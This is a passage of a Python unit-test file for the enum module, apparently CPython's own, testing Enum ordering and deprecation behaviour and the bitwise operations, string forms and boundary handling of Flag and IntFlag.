                code          = 'An$(5,1)', 2
                description   = 'Bn$', 3

    @unittest.skipUnless(
            python_version == (3, 9),
            'private variables are now normal attributes',
            )
    def test_warning_for_private_variables(self):
        # 3.9 only: name-mangled "private" names warn but are still mangled
        # into members.
        with self.assertWarns(DeprecationWarning):
            class Private(Enum):
                __corporal = 'Radar'
        self.assertEqual(Private._Private__corporal.value, 'Radar')
        try:
            with self.assertWarns(DeprecationWarning):
                class Private(Enum):
                    __major_ = 'Hoolihan'
        except ValueError:
            pass

    def test_private_variable_is_normal_attribute(self):
        # Mangled private names are plain attributes, not members.
        class Private(Enum):
            __corporal = 'Radar'
            __major_ = 'Hoolihan'
        self.assertEqual(Private._Private__corporal, 'Radar')
        self.assertEqual(Private._Private__major_, 'Hoolihan')

    @unittest.skipUnless(
            python_version < (3, 12),
            'member-member access now raises an exception',
            )
    def test_warning_for_member_from_member_access(self):
        # Pre-3.12: accessing one member as an attribute of another warns.
        with self.assertWarns(DeprecationWarning):
            class Di(Enum):
                YES = 1
                NO = 0
            nope = Di.YES.NO
        self.assertIs(Di.NO, nope)

    @unittest.skipUnless(
            python_version >= (3, 12),
            'member-member access currently issues a warning',
            )
    def test_exception_for_member_from_member_access(self):
        # 3.12+: accessing one member as an attribute of another raises.
        with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
            class Di(Enum):
                YES = 1
                NO = 0
            nope = Di.YES.NO

    def test_strenum_auto(self):
        # StrEnum's auto() produces the lower-cased member name.
        class Strings(StrEnum):
            ONE = auto()
            TWO = auto()
        self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])

    def test_dynamic_members_with_static_methods(self):
        # Members injected via vars().update() coexist with regular methods;
        # re-defining an existing name is rejected.
        #
        foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
        class Foo(Enum):
            vars().update({
                    k: v
                    for k, v in foo_defines.items()
                    if k.startswith('FOO_')
                    })
            def upper(self):
                return self.value.upper()
        self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
        self.assertEqual(Foo.FOO_CAT.value, 'aloof')
        self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
        #
        with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
            class FooBar(Enum):
                vars().update({
                        k: v
                        for k, v in foo_defines.items()
                        if k.startswith('FOO_')
                        },
                        **{'FOO_CAT': 'small'},
                        )
                def upper(self):
                    return self.value.upper()


class TestOrder(unittest.TestCase):
    """Tests of the _order_ declaration's agreement with member order."""

    def test_same_members(self):
        class Color(Enum):
            _order_ = 'red green blue'
            red = 1
            green = 2
            blue = 3

    def test_same_members_with_aliases(self):
        # Aliases are excluded from the _order_ check.
        class Color(Enum):
            _order_ = 'red green blue'
            red = 1
            green = 2
            blue = 3
            verde = green

    def test_same_members_wrong_order(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue'
                red = 1
                blue = 3
                green = 2

    def test_order_has_extra_members(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue purple'
                red = 1
                green = 2
                blue = 3

    def test_order_has_extra_members_with_aliases(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue purple'
                red = 1
                green = 2
                blue = 3
                verde = green

    def test_enum_has_extra_members(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue'
                red = 1
                green = 2
                blue = 3
                purple = 4

    def test_enum_has_extra_members_with_aliases(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue'
                red = 1
                green = 2
                blue = 3
                purple = 4
                verde = green


class TestFlag(unittest.TestCase):
    """Tests of the Flags."""

    class Perm(Flag):
        R, W, X = 4, 2, 1

    class Open(Flag):
        RO = 0
        WO = 1
        RW = 2
        AC = 3
        CE = 1<<19

    class Color(Flag):
        BLACK = 0
        RED = 1
        ROJO = 1
        GREEN = 2
        BLUE = 4
        PURPLE = RED|BLUE
        WHITE = RED|GREEN|BLUE
        BLANCO = RED|GREEN|BLUE

    def test_str(self):
        # str() of combinations and inversions lists the constituent names.
        Perm = self.Perm
        self.assertEqual(str(Perm.R), 'R')
        self.assertEqual(str(Perm.W), 'W')
        self.assertEqual(str(Perm.X), 'X')
        self.assertEqual(str(Perm.R | Perm.W), 'R|W')
        self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
        self.assertEqual(str(Perm(0)), 'Perm(0)')
        self.assertEqual(str(~Perm.R), 'W|X')
        self.assertEqual(str(~Perm.W), 'R|X')
        self.assertEqual(str(~Perm.X), 'R|W')
        self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
        self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
        self.assertEqual(str(Perm(~0)), 'R|W|X')

        Open = self.Open
        self.assertEqual(str(Open.RO), 'RO')
        self.assertEqual(str(Open.WO), 'WO')
        self.assertEqual(str(Open.AC), 'AC')
        self.assertEqual(str(Open.RO | Open.CE), 'CE')
        self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
        self.assertEqual(str(~Open.RO), 'WO|RW|CE')
        self.assertEqual(str(~Open.WO), 'RW|CE')
        self.assertEqual(str(~Open.AC), 'CE')
        self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
        self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')

    def test_repr(self):
        # repr() of combinations joins qualified member names.
        Perm = self.Perm
        self.assertEqual(repr(Perm.R), 'Perm.R')
        self.assertEqual(repr(Perm.W), 'Perm.W')
        self.assertEqual(repr(Perm.X), 'Perm.X')
        self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
        self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
        self.assertEqual(repr(Perm(0)), '0x0')
        self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
        self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
        self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
        self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
        self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
        self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')

        Open = self.Open
        self.assertEqual(repr(Open.RO), 'Open.RO')
        self.assertEqual(repr(Open.WO), 'Open.WO')
        self.assertEqual(repr(Open.AC), 'Open.AC')
        self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
        self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
        self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
        self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
        self.assertEqual(repr(~Open.AC), 'Open.CE')
        self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
        self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')

    def test_format(self):
        Perm = self.Perm
        self.assertEqual(format(Perm.R, ''), 'R')
        self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')

    def test_or(self):
        # | combines flags bitwise; identical operands return the same member.
        Perm = self.Perm
        for i in Perm:
            for j in Perm:
                self.assertEqual((i | j), Perm(i.value | j.value))
                self.assertEqual((i | j).value, i.value | j.value)
                self.assertIs(type(i | j), Perm)
        for i in Perm:
            self.assertIs(i | i, i)
        Open = self.Open
        self.assertIs(Open.RO | Open.CE, Open.CE)

    def test_and(self):
        # & intersects flag bits.
        Perm = self.Perm
        RW = Perm.R | Perm.W
        RX = Perm.R | Perm.X
        WX = Perm.W | Perm.X
        RWX = Perm.R | Perm.W | Perm.X
        values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
        for i in values:
            for j in values:
                self.assertEqual((i & j).value, i.value & j.value)
                self.assertIs(type(i & j), Perm)
        for i in Perm:
            self.assertIs(i & i, i)
            self.assertIs(i & RWX, i)
            self.assertIs(RWX & i, i)
        Open = self.Open
        self.assertIs(Open.RO & Open.CE, Open.RO)

    def test_xor(self):
        # ^ toggles flag bits; Perm(0) is the identity.
        Perm = self.Perm
        for i in Perm:
            for j in Perm:
                self.assertEqual((i ^ j).value, i.value ^ j.value)
                self.assertIs(type(i ^ j), Perm)
        for i in Perm:
            self.assertIs(i ^ Perm(0), i)
            self.assertIs(Perm(0) ^ i, i)
        Open = self.Open
        self.assertIs(Open.RO ^ Open.CE, Open.CE)
        self.assertIs(Open.CE ^ Open.CE, Open.RO)

    def test_invert(self):
        # ~ is an involution within the flag's defined bits.
        Perm = self.Perm
        RW = Perm.R | Perm.W
        RX = Perm.R | Perm.X
        WX = Perm.W | Perm.X
        RWX = Perm.R | Perm.W | Perm.X
        values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
        for i in values:
            self.assertIs(type(~i), Perm)
            self.assertEqual(~~i, i)
        for i in Perm:
            self.assertIs(~~i, i)
        Open = self.Open
        self.assertIs(Open.WO & ~Open.WO, Open.RO)
        self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)

    def test_bool(self):
        # Truthiness follows the underlying integer value.
        Perm = self.Perm
        for f in Perm:
            self.assertTrue(f)
        Open = self.Open
        for f in Open:
            self.assertEqual(bool(f.value), bool(f))

    def test_boundary(self):
        # The boundary= keyword controls handling of out-of-range values:
        # STRICT raises, CONFORM masks, EJECT returns a plain int, KEEP keeps.
        self.assertIs(enum.Flag._boundary_, STRICT)
        class Iron(Flag, boundary=STRICT):
            ONE = 1
            TWO = 2
            EIGHT = 8
        self.assertIs(Iron._boundary_, STRICT)
        #
        class Water(Flag, boundary=CONFORM):
            ONE = 1
            TWO = 2
            EIGHT = 8
        self.assertIs(Water._boundary_, CONFORM)
        #
        class Space(Flag, boundary=EJECT):
            ONE = 1
            TWO = 2
            EIGHT = 8
        self.assertIs(Space._boundary_, EJECT)
        #
        class Bizarre(Flag, boundary=KEEP):
            b = 3
            c = 4
            d = 6
        #
        self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
        #
        self.assertIs(Water(7), Water.ONE|Water.TWO)
        self.assertIs(Water(~9), Water.TWO)
        #
        self.assertEqual(Space(7), 7)
        self.assertTrue(type(Space(7)) is int)
        #
        self.assertEqual(list(Bizarre), [Bizarre.c])
        self.assertIs(Bizarre(3), Bizarre.b)
        self.assertIs(Bizarre(6), Bizarre.d)

    def test_iter(self):
        # Iteration yields canonical single-bit members only (no aliases,
        # no zero member, no composites).
        Color = self.Color
        Open = self.Open
        self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
        self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])

    def test_programatic_function_string(self):
        # Functional API with a space-separated name string.
        Perm = Flag('Perm', 'R W X')
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<i
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_string_with_start(self):
        # start= sets the first flag value; later values shift from it.
        Perm = Flag('Perm', 'R W X', start=8)
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 8<<i
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_string_list(self):
        # Functional API with a list of names.
        Perm = Flag('Perm', ['R', 'W', 'X'])
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<i
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_iterable(self):
        # Functional API with explicit (name, value) pairs.
        Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<(2*i+1)
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_from_dict(self):
        # Functional API with a mapping of name -> value.
        Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<(2*i+1)
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_pickle(self):
        # FlagStooges is defined in a support module; if importing it failed
        # it is stored as the exception, re-raised here.
        if isinstance(FlagStooges, Exception):
            raise FlagStooges
        test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
        test_pickle_dump_load(self.assertIs, FlagStooges)

    @unittest.skipIf(
            python_version >= (3, 12),
            '__contains__ now returns True/False for all inputs',
            )
    def test_contains_er(self):
        # Pre-3.12: `in` with a non-member raises TypeError (after warning).
        Open = self.Open
        Color = self.Color
        self.assertFalse(Color.BLACK in Open)
        self.assertFalse(Open.RO in Color)
        with self.assertRaises(TypeError):
            with self.assertWarns(DeprecationWarning):
                'BLACK' in Color
        with self.assertRaises(TypeError):
            with self.assertWarns(DeprecationWarning):
                'RO' in Open
        with self.assertRaises(TypeError):
            with self.assertWarns(DeprecationWarning):
                1 in Color
        with self.assertRaises(TypeError):
            with self.assertWarns(DeprecationWarning):
                1 in Open

    @unittest.skipIf(
            python_version < (3, 12),
            '__contains__ only works with enum memmbers before 3.12',
            )
    def test_contains_tf(self):
        # 3.12+: `in` accepts any input and returns True/False.
        Open = self.Open
        Color = self.Color
        self.assertFalse(Color.BLACK in Open)
        self.assertFalse(Open.RO in Color)
        self.assertFalse('BLACK' in Color)
        self.assertFalse('RO' in Open)
        self.assertTrue(1 in Color)
        self.assertTrue(1 in Open)

    def test_member_contains(self):
        # `flag in composite` tests bit membership.
        Perm = self.Perm
        R, W, X = Perm
        RW = R | W
        RX = R | X
        WX = W | X
        RWX = R | W | X
        self.assertTrue(R in RW)
        self.assertTrue(R in RX)
        self.assertTrue(R in RWX)
        self.assertTrue(W in RW)
        self.assertTrue(W in WX)
        self.assertTrue(W in RWX)
        self.assertTrue(X in RX)
        self.assertTrue(X in WX)
        self.assertTrue(X in RWX)
        self.assertFalse(R in WX)
        self.assertFalse(W in RX)
        self.assertFalse(X in RW)

    def test_member_iter(self):
        # Iterating a composite member yields its canonical single-bit parts.
        Color = self.Color
        self.assertEqual(list(Color.BLACK), [])
        self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
        self.assertEqual(list(Color.BLUE), [Color.BLUE])
        self.assertEqual(list(Color.GREEN), [Color.GREEN])
        self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
        self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])

    def test_member_length(self):
        self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1) self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2) self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3) def test_number_reset_and_order_cleanup(self): class Confused(Flag): _order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN' ONE = auto() TWO = auto() FOUR = auto() DOS = 2 EIGHT = auto() SIXTEEN = auto() self.assertEqual( list(Confused), [Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN]) self.assertIs(Confused.TWO, Confused.DOS) self.assertEqual(Confused.DOS._value_, 2) self.assertEqual(Confused.EIGHT._value_, 8) self.assertEqual(Confused.SIXTEEN._value_, 16) def test_aliases(self): Color = self.Color self.assertEqual(Color(1).name, 'RED') self.assertEqual(Color['ROJO'].name, 'RED') self.assertEqual(Color(7).name, 'WHITE') self.assertEqual(Color['BLANCO'].name, 'WHITE') self.assertIs(Color.BLANCO, Color.WHITE) Open = self.Open self.assertIs(Open['AC'], Open.AC) def test_auto_number(self): class Color(Flag): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 4) def test_auto_number_garbage(self): with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'): class Color(Flag): red = 'not an int' blue = auto() def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes)) def test_multiple_mixin(self): class AllMixin: @classproperty def ALL(cls): members = list(cls) all_value = None if members: all_value = members[0] for member in members[1:]: all_value |= member cls.ALL = all_value return all_value class StrMixin: def __str__(self): return self._name_.lower() class Color(AllMixin, Flag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) 
self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'BLUE') class Color(AllMixin, StrMixin, Flag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') class Color(StrMixin, AllMixin, Flag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') @threading_helper.reap_threads def test_unique_composite(self): # override __eq__ to be identity only class TestFlag(Flag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) # have multiple threads competing to complete the composite members seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [ threading.Thread(target=cycle_enum) for _ in range(8) ] with threading_helper.start_threads(threads): pass # check that only 248 members were created self.assertFalse( failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') def test_init_subclass(self): class MyEnum(Flag): def __init_subclass__(cls, **kwds): super().__init_subclass__(**kwds) self.assertFalse(cls.__dict__.get('_test', False)) cls._test1 = 'MyEnum' # class TheirEnum(MyEnum): def __init_subclass__(cls, **kwds): super(TheirEnum, cls).__init_subclass__(**kwds) cls._test2 = 'TheirEnum' class WhoseEnum(TheirEnum): def __init_subclass__(cls, **kwds): pass class NoEnum(WhoseEnum): ONE = 1 
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum') self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum') self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum') self.assertFalse(NoEnum.__dict__.get('_test1', False)) self.assertFalse(NoEnum.__dict__.get('_test2', False)) # class OurEnum(MyEnum): def __init_subclass__(cls, **kwds): cls._test2 = 'OurEnum' class WhereEnum(OurEnum): def __init_subclass__(cls, **kwds): pass class NeverEnum(WhereEnum): ONE = 1 self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum') self.assertFalse(WhereEnum.__dict__.get('_test1', False)) self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum') self.assertFalse(NeverEnum.__dict__.get('_test1', False)) self.assertFalse(NeverEnum.__dict__.get('_test2', False)) def test_default_missing(self): with self.assertRaisesRegex( ValueError, "'RED' is not a valid TestFlag.Color", ) as ctx: self.Color('RED') self.assertIs(ctx.exception.__context__, None) P = Flag('P', 'X Y') with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx: P('X') self.assertIs(ctx.exception.__context__, None) class TestIntFlag(unittest.TestCase): """Tests of the IntFlags.""" class Perm(IntFlag): R = 1 << 2 W = 1 << 1 X = 1 << 0 class Open(IntFlag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1<<19 class Color(IntFlag): BLACK = 0 RED = 1 ROJO = 1 GREEN = 2 BLUE = 4 PURPLE = RED|BLUE WHITE = RED|GREEN|BLUE BLANCO = RED|GREEN|BLUE class Skip(IntFlag): FIRST = 1 SECOND = 2 EIGHTH = 8 def test_type(self): Perm = self.Perm self.assertTrue(Perm._member_type_ is int) Open = self.Open for f in Perm: self.assertTrue(isinstance(f, Perm)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Perm.W | Perm.X, Perm)) self.assertEqual(Perm.W | Perm.X, 3) for f in Open: self.assertTrue(isinstance(f, Open)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Open.WO | Open.RW, Open)) self.assertEqual(Open.WO | Open.RW, 3) def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'R') 
self.assertEqual(str(Perm.W), 'W') self.assertEqual(str(Perm.X), 'X') self.assertEqual(str(Perm.R | Perm.W), 'R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X') self.assertEqual(str(Perm.R | 8), '12') self.assertEqual(str(Perm(0)), 'Perm(0)') self.assertEqual(str(Perm(8)), '8') self.assertEqual(str(~Perm.R), 'W|X') self.assertEqual(str(~Perm.W), 'R|X') self.assertEqual(str(~Perm.X), 'R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'X') self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)') self.assertEqual(str(~(Perm.R | 8)), '-13') self.assertEqual(str(Perm(~0)), 'R|W|X') self.assertEqual(str(Perm(~8)), '-9') Open = self.Open self.assertEqual(str(Open.RO), 'RO') self.assertEqual(str(Open.WO), 'WO') self.assertEqual(str(Open.AC), 'AC') self.assertEqual(str(Open.RO | Open.CE), 'CE') self.assertEqual(str(Open.WO | Open.CE), 'WO|CE') self.assertEqual(str(Open(4)), '4') self.assertEqual(str(~Open.RO), 'WO|RW|CE') self.assertEqual(str(~Open.WO), 'RW|CE') self.assertEqual(str(~Open.AC), 'CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'AC') self.assertEqual(str(~(Open.WO | Open.CE)), 'RW') self.assertEqual(str(Open(~4)), '-5') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), 'Perm.R') self.assertEqual(repr(Perm.W), 'Perm.W') self.assertEqual(repr(Perm.X), 'Perm.X') self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X') self.assertEqual(repr(Perm.R | 8), '12') self.assertEqual(repr(Perm(0)), '0x0') self.assertEqual(repr(Perm(8)), '8') self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X') self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X') self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W') self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0') self.assertEqual(repr(~(Perm.R | 8)), '-13') self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X') self.assertEqual(repr(Perm(~8)), '-9') Open = self.Open 
self.assertEqual(repr(Open.RO), 'Open.RO') self.assertEqual(repr(Open.WO), 'Open.WO') self.assertEqual(repr(Open.AC), 'Open.AC') self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE') self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE') self.assertEqual(repr(Open(4)), '4') self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE') self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE') self.assertEqual(repr(~Open.AC), 'Open.CE') self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC') self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW') self.assertEqual(repr(Open(~4)), '-5') def test_global_repr_keep(self): self.assertEqual( repr(HeadlightsK(0)), '%s.OFF_K' % SHORT_MODULE, ) self.assertEqual( repr(HeadlightsK(2**0 + 2**2 + 2**3)), '%(m)s.LOW_BEAM_K|%(m)s.FOG_K|0x8' % {'m': SHORT_MODULE}, ) self.assertEqual( repr(HeadlightsK(2**3)), '%(m)s.HeadlightsK(0x8)' % {'m': SHORT_MODULE}, ) def test_global_repr_conform1(self): self.assertEqual( repr(HeadlightsC(0)), '%s.OFF_C' % SHORT_MODULE, ) self.assertEqual( repr(HeadlightsC(2**0 + 2**2 + 2**3)), '%(m)s.LOW_BEAM_C|%(m)s.FOG_C' % {'m': SHORT_MODULE}, ) self.assertEqual( repr(HeadlightsC(2**3)), '%(m)s.OFF_C' % {'m': SHORT_MODULE}, ) def test_format(self): Perm = self.Perm self.assertEqual(format(Perm.R, ''), '4') self.assertEqual(format(Perm.R | Perm.X, ''), '5') # class NewPerm(IntFlag): R = 1 << 2 W = 1 << 1 X = 1 << 0 def __str__(self): return self._name_ self.assertEqual(format(NewPerm.R, ''), 'R') self.assertEqual(format(NewPerm.R | Perm.X, ''), 'R|X') def test_or(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i | j, i.value | j.value) self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for j in range(8): self.assertEqual(i | j, i.value | j) self.assertEqual((i | j).value, i.value | j) self.assertIs(type(i | j), Perm) self.assertEqual(j | i, j | i.value) self.assertEqual((j | i).value, j | i.value) self.assertIs(type(j | i), Perm) for i in Perm: 
self.assertIs(i | i, i) self.assertIs(i | 0, i) self.assertIs(0 | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j)) for j in range(8): self.assertEqual(i & j, i.value & j) self.assertEqual((i & j).value, i.value & j) self.assertIs(type(i & j), Perm) self.assertEqual(j & i, j & i.value) self.assertEqual((j & i).value, j & i.value) self.assertIs(type(j & i), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & 7, i) self.assertIs(7 & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i ^ j, i.value ^ j.value) self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for j in range(8): self.assertEqual(i ^ j, i.value ^ j) self.assertEqual((i ^ j).value, i.value ^ j) self.assertIs(type(i ^ j), Perm) self.assertEqual(j ^ i, j ^ i.value) self.assertEqual((j ^ i).value, j ^ i.value) self.assertIs(type(j ^ i), Perm) for i in Perm: self.assertIs(i ^ 0, i) self.assertIs(0 ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertEqual(~i, (~i).value) self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE) 
